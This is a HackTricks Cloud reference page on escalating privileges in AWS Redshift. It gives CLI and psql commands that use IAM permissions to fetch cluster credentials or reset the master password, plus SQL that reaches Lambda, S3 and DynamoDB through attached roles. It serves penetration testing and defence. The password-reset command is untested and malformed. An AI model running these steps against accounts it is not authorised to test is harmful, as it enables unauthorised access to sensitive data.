# AWS - Redshift Privesc
{% hint style="success" %}
Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
Learn & practice GCP Hacking:
[**HackTricks Training GCP Red Team Expert (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## Redshift
For more information about RDS check:
{% content-ref url="../aws-services/aws-redshift-enum.md" %}
[aws-redshift-enum.md](../aws-services/aws-redshift-enum.md)
{% endcontent-ref %}
### `redshift:DescribeClusters`, `redshift:GetClusterCredentials`
With these permissions you can get **info of all the clusters** (including name and cluster username) and **get credentials** to access it:
```bash
# Get creds
aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:" -d template1 -p 5439
```
**Potential Impact:** Find sensitive info inside the databases.
### `redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM`
With these permissions you can get **info of all the clusters** and **get credentials** to access it.\
Note that the postgres user will have the **permissions that the IAM identity** used to get the credentials has.
```bash
# Get creds
aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439
```
**Potential Impact:** Find sensitive info inside the databases.
### `redshift:DescribeClusters`, `redshift:ModifyCluster?`
It's possible to **modify the master password** of the internal postgres (redshit) user from aws cli (I think those are the permissions you need but I haven't tested them yet):
```
aws redshift modify-cluster –cluster-identifier –master-user-password ‘master-password’;
```
**Potential Impact:** Find sensitive info inside the databases.
## Accessing External Services
{% hint style="warning" %}
To access all the following resources, you will need to **specify the role to use**. A Redshift cluster **can have assigned a list of AWS roles** that you can use **if you know the ARN** or you can just set "**default**" to use the default one assigned.
Moreover, as [**explained here**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), Redshift also allows to concat roles (as long as the first one can assume the second one) to get further access but just **separating** them with a **comma**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';`
{% endhint %}
### Lambdas
As explained in [https://docs.aws.amazon.com/redshift/latest/dg/r\_CREATE\_EXTERNAL\_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), it's possible to **call a lambda function from redshift** with something like:
```sql
CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT)
RETURNS INT
STABLE
LAMBDA 'lambda_function'
IAM_ROLE default;
```
### S3
As explained in [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), it's possible to **read and write into S3 buckets**:
```sql
# Read
copy table from 's3:///load/key_prefix'
credentials 'aws_iam_role=arn:aws:iam:::role/'
region ''
options;
# Write
unload ('select * from venue')
to 's3://mybucket/tickit/unload/venue_'
iam_role default;
```
### Dynamo
As explained in [https://docs.aws.amazon.com/redshift/latest/dg/t\_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), it's possible to **get data from dynamodb**:
```sql
copy favoritemovies
from 'dynamodb://ProductCatalog'
iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';
```
{% hint style="warning" %}
The Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) option to specify the AWS Region in which the Amazon DynamoDB table is located.
{% endhint %}
### EMR
Check [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html)
## References
* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
{% hint style="success" %}
Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
Learn & practice GCP Hacking:
[**HackTricks Training GCP Red Team Expert (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}